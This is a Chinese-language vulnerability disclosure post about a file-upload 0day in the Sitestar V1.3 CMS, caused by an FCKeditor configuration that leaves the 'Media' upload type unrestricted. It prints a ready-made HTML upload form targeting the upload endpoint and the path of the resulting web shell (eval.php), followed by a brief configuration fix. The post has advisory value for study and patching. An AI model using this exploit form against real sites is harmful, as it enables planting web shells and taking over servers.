热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

建站之星sitestar V1.3 通杀0day

发布时间:2011-01-15 11:20文章来源:黑白前线文章作者:udb311 点击次数:
摘要:发布日期:2011-01.15 发布作者:udb311 影响版本:sitestar V1.3 官方网站:http://www.sitestar.cn 漏洞类型:文件上传 漏洞描述:此漏洞存仍然存在于FCK上传,程序采用了FCKeditor Version 2 .0。除了xiaocao 童鞋发布的建立1.ASP文件夹漏洞,还存在上传p...

发布日期:2011-01.15
发布作者:udb311

影响版本:sitestar V1.3
官方网站:http://www.sitestar.cn

漏洞类型:文件上传
漏洞描述:此漏洞存仍然存在于FCK上传,程序采用了FCKeditor Version 2 .0。除了xiaocao 童鞋发布的建立1.ASP文件夹漏洞,还存在上传php脚本漏洞。
 

关键字:保留吧,以免批量``

漏洞文件:/admin/fckeditor/upload/config.php

 

  1. <?php 
  2. //省略代码
  3. // Due to security issues with Apache modules, it is reccomended to leave the  
  4. // following setting enabled.  
  5. $Config['ForceSingleExtension'] = true ;  
  6.  
  7. $Config['AllowedExtensions']['File']    = array() ;  
  8. $Config['DeniedExtensions']['File']     = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;  
  9.  
  10. $Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;  
  11. $Config['DeniedExtensions']['Image']    = array() ;  
  12.  
  13. $Config['AllowedExtensions']['Flash']   = array('swf','fla') ;  
  14. $Config['DeniedExtensions']['Flash']    = array() ;  
  15.  
  16. ?> 

看代码,这是修改过的FCKeditor配置文件。未'Media'进行限制,导致可以上传任意文件。

 

测试方法:

和Fckeditor 2.4.2 原理一样。

http://www.hackline.net/a/news/ldfb/web/2009/1013/1005_2.html

上传EXP:

 <form id="frmUpload" enctype="multipart/form-data" action="http://www.hackline.net/admin/fckeditor//upload//upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

 

 

上传shell地址:

http://域名/upload/media/eval.php

上图证明:


 

漏洞修复:同理

修改config文件,限制上传目录的脚本执行权限。

  1. $Config['AllowedExtensions']['Media'] = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;  
  2. $Config['DeniedExtensions']['Media'] = array() ; 

 

标签分类: 文件上传

上一篇:建站之星Sitestar v1.3 FCK上传漏洞
下一篇:NetCMS网站内容管理系统数据库信息泄露漏洞